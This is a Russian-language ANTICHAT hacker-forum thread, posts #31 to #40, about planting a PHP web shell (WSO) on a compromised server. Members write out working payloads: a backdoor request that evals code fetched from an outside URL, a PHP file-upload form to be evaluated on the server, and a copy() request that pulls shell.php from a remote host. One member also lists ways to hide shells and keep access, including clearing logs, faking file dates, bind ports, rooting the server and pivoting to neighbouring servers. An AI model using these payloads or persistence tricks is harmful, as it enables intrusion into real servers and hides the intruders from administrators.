HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 14.12.2011, 10:32
Jopashnik
Новичок
Регистрация: 27.10.2010
Сообщений: 9
С нами: 8180246

Репутация: 0
По умолчанию

СПС тебе тс, критиковать все могут, а сами не то что статью, тупо помочь в чем то обламываются и ответить на вопросы новичков бояться, что если новичек узнает и начнет шарить в чем то то все их бизу конец
 
Ответить с цитированием

  #32  
Старый 14.12.2011, 14:40
Osstudio
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами: 7932566

Репутация: 81


По умолчанию

Цитата:
Сообщение от Ereee  
Доп:
1.Вообще можно заевалить WSO без его физической загрузки на сервер. Для этого убираем Остальное заевалим таким способом:
http://site.ru/backdoor.php?cmd=eval(file_get_contents('http://url/ws.txt'));
2. Загрузка прямо из компьютера, евалим это:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"

Shell:

"
[/COLOR][COLOR="#007700"];

if(!empty([/
COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]))

{

@[/
COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],

[/
COLOR][COLOR="#DD0000"]'./'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]) ?

print[/COLOR][COLOR="#DD0000"]'File '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]].

[/
COLOR][COLOR="#DD0000"]' uploaded!
'
[/COLOR][COLOR="#007700"]: print[/COLOR][COLOR="#DD0000"]'Try...
'";

}[/COLOR][/COLOR] 
.
"eval(file_get_contents('http://url/ws.txt'));" зачем ты написал эвал, если cmd=... итак эвалится?

Как было написано в статье, то почти всегда нельзя использовать кавычки, и поэтому я и использовать chr(); И без физ.загрузки это уже не "шелл на сервере", да и зачем такая сложная форма загрузки на сервер? в моей статье всё расписано, как проще сделать.

Цитата:
Сообщение от Jopashnik  
СПС тебе тс, критиковать все могут, а сами не то что статью, тупо помочь в чем то обламываются и ответить на вопросы новичков бояться, что если новичек узнает и начнет шарить в чем то то все их бизу конец

P.S И вообще, дорогие РОА, МОА, сами посмотрите, что кроме вас, которые это уже знают, есть очень много людей, которым это нужно.
 
Ответить с цитированием

  #33  
Старый 14.12.2011, 16:53
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Osstudio, а разница?)
 
Ответить с цитированием

  #34  
Старый 14.12.2011, 17:04
Osstudio
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами: 7932566

Репутация: 81


По умолчанию

Цитата:
Сообщение от Ereee  
Osstudio
, а разница?)
Смотря в чём
 
Ответить с цитированием

  #35  
Старый 14.12.2011, 17:18
KolosJey
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами: 8625634

Репутация: 0
По умолчанию

Цитата:
Сообщение от Osstudio  
"eval(file_get_contents('http://url/ws.txt'));" зачем ты написал эвал, если cmd=... итак эвалится?
::facepalm::

Цитата:
Сообщение от Osstudio  
Как было написано в статье, то почти всегда нельзя использовать кавычки, и поэтому я и использовать chr();
Открой для себя функции php. Начни со stripslashes().

Цитата:
Сообщение от Osstudio  
чтобы задать тип переменной в php типа string, не мешало бы значение поместить в кавычки, а вот оказывается нет. Достаточно использовать функцию chr(); Эта функция "преобразовывает" ASCII в "обычный текст"
Да фиг с ними с функциями, тайна: данные с реквеста php и так принимает строковыми, а если бы он делал по другому случилось бы страшное безобразие, поверь мне. (только никому!!)

Я бы на месте модератора РОА взял туда ТСа, что бы его посты не индексировались гуглом )
 
Ответить с цитированием

  #36  
Старый 14.12.2011, 17:25
Jopashnik
Новичок
Регистрация: 27.10.2010
Сообщений: 9
С нами: 8180246

Репутация: 0
По умолчанию

Цитата:
Сообщение от KolosJey  
Я бы на месте модератора РОА взял туда ТСа, что бы его посты не индексировались гуглом )
а смысл??? Они же все знают и ток писать что это паблик инфа могут, тс это писал для тех кто плохо в этом шарит и кому это будет нужно, а им как раз это вроде как и нах не надо

Ну а так в целом я думаю тс шарит нормально и он думаю был бы не против
 
Ответить с цитированием

  #37  
Старый 14.12.2011, 17:47
Osstudio
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами: 7932566

Репутация: 81


По умолчанию

Цитата:
Сообщение от KolosJey  
::facepalm::
Открой для себя функции php. Начни со stripslashes().
Да фиг с ними с функциями, тайна: данные с реквеста php и так принимает строковыми, а если бы он делал по другому случилось бы страшное безобразие, поверь мне. (только никому!!)
Я бы на месте модератора РОА взял туда ТСа, что бы его посты не индексировались гуглом )
Согласен, тип string можно к примеру сделать так $a = (bla); , но ведь нельзя тогда использовать пробелы, спец.символы. что касается stripslashes() то какая разница, если пхп тупо выдаёт ошибку, если даже \' ??

А насчёт ::facepalm::, eval(eval) - на мой взгляд полный бред
 
Ответить с цитированием

  #38  
Старый 14.12.2011, 17:56
KolosJey
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами: 8625634

Репутация: 0
По умолчанию

Цитата:
Сообщение от Osstudio  
Согласен, тип string можно к примеру сделать так $a = (bla); , но ведь нельзя тогда использовать пробелы, спец.символы.
ev=copy($_REQUEST[aa], $_REQUEST[bb]);&aa=http://site.ru/shell.php&bb=./shell.php

Цитата:
Сообщение от Osstudio  
что касается stripslashes() то какая разница, если пхп тупо выдаёт ошибку, если даже \' ??
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Цитата:
Сообщение от Osstudio  
А насчёт ::facepalm::, eval(eval) - на мой взгляд полный бред
А это тебе домашнее задание )
 
Ответить с цитированием

  #39  
Старый 14.12.2011, 18:17
|qbz|
Познающий
Регистрация: 25.12.2009
Сообщений: 95
С нами: 8619861

Репутация: 51
По умолчанию

ТС, скажи мне лучше как ты прячешь шеллы на сервере. Мне не для того, чтобы узнать, а просто интересно, что ты знаешь в данной области.
 
Ответить с цитированием

  #40  
Старый 14.12.2011, 18:39
Osstudio
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами: 7932566

Репутация: 81


По умолчанию

Цитата:
Сообщение от |qbz|  
ТС, скажи мне лучше как ты прячешь шеллы на сервере. Мне не для того, чтобы узнать, а просто интересно, что ты знаешь в данной области.
1.) Беспалевное имя

2.) Запрячу в самом дальнем каталоге, где много фалов.

3.) Почищу логи

4.) Изменю дату создания файла

5.) Заодно делаю бинд порт, если удалят, он часто остаётся.

6.) Да и много ещё чего придумать можно. Также сначала рутаю, затем кидаю на соседние сервера, чтобы потом с них пробиться можно было, на соседах также выполняю пункты выше.

P.S А ты?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.